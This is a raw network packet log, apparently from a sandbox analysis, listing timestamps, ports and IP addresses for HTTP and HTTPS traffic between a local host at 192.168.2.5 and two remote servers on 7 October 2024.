Oct 7, 2024 03:15:36.932703018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.960850000 CEST	443	49815	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.961905956 CEST	49815	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.961970091 CEST	443	49815	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.962383986 CEST	49815	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.962392092 CEST	443	49815	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.976198912 CEST	443	49813	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.978353024 CEST	49813	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.978413105 CEST	443	49813	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.978837967 CEST	49813	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.978851080 CEST	443	49813	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.987528086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.987585068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.987638950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.987673998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.987692118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.987725973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.987745047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.987760067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.987778902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.987804890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.987813950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.987834930 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.987848043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.987871885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.987880945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.987914085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.987915039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.987942934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.987958908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.987971067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.987971067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.987982988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.987992048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.987999916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.988012075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.988049030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.988049030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.998290062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998332024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998358011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998377085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998390913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998408079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.998409033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998452902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.998478889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.998665094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998678923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998703957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998718977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998733997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.998735905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998759031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998769045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.998775005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998786926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.998791933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998806000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998821974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998833895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.998872995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.998878002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998951912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.998967886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999005079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999018908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999023914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999034882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999049902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999067068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999085903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999087095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999110937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999126911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999135971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999145031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999151945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999180079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999190092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999196053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999211073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999227047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999226093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999244928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999248981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999267101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999281883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999290943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999299049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999314070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999315977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999332905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999337912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999361038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999377012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999382019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999403954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999422073 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999428988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999444008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999455929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999460936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999476910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999479055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999521017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999550104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999587059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999610901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999627113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999667883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999696970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999718904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999735117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999748945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999763966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999778032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.999784946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.999828100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.000622034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000637054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000673056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000675917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.000704050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.000715971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000721931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.000731945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000760078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000776052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000770092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.000793934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000793934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.000811100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000811100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.000829935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.000850916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.000866890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.000874996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000899076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000916004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000922918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000929117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.000947952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000962973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000972033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.000979900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.000983953 CEST	443	49814	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.000996113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001008034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001022100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001028061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001039028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001065969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001076937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001092911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001107931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001117945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001127005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001138926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001142025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001158953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001183987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001184940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001203060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001218081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001225948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001233101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001247883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001249075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001265049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001283884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001318932 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001321077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001368999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001384974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001406908 CEST	49814	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.001420975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001427889 CEST	443	49814	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.001451015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001466990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001482964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001507044 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001519918 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001523018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001539946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.001566887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001584053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.001822948 CEST	49814	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.001835108 CEST	443	49814	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.021440983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.021552086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.021586895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.021620035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.021645069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.021653891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.021687984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.021693945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.021714926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.021725893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.021744967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.021754026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.021781921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.021804094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.023458004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.023473978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.023488998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.023503065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.023519039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.023534060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.023540020 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.023550034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.023566008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.023578882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.023605108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.023634911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.055915117 CEST	443	49816	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.056313992 CEST	49816	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.056329966 CEST	443	49816	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.056915045 CEST	49816	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.056921005 CEST	443	49816	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.059783936 CEST	443	49815	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.059818029 CEST	443	49815	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.059875965 CEST	443	49815	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.059962034 CEST	49815	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.059962034 CEST	49815	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.060137987 CEST	49815	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.060163021 CEST	443	49815	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.060194016 CEST	49815	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.060201883 CEST	443	49815	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.062838078 CEST	49818	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.062892914 CEST	443	49818	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.063121080 CEST	49818	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.063240051 CEST	49818	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.063256979 CEST	443	49818	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.070254087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070271969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070286989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070343018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070353985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.070368052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070384979 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070399046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.070413113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070420980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.070429087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070444107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070457935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070460081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.070473909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070477009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.070491076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070504904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070522070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.070525885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.070548058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.070566893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.077944994 CEST	443	49813	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.078103065 CEST	443	49813	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.078304052 CEST	49813	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.078500986 CEST	49813	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.078500986 CEST	49813	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.078540087 CEST	443	49813	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.078567982 CEST	443	49813	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.080832005 CEST	49819	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.080862045 CEST	443	49819	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.080959082 CEST	49819	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.081073999 CEST	49819	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.081084013 CEST	443	49819	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.089296103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.089340925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.089354992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.089370966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.089385986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.089405060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.089416981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.089421034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.089437008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.089451075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.089474916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.089504004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090342045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090398073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090411901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090435982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090454102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090468884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090468884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090512991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090512991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090528011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090529919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090543985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090578079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090611935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090612888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090626955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090641975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090658903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090670109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090676069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090692997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090701103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090718985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090729952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090735912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090751886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090754986 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090765953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090794086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090801001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090809107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090823889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090830088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090873003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090873003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090873003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090903997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090919018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.090933084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090950966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.090972900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091010094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091023922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091057062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091061115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091078997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091078997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091094971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091109991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091113091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091131926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.091134071 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.091156006 CEST	80	49782	95.164.90.97	192.168.2.5
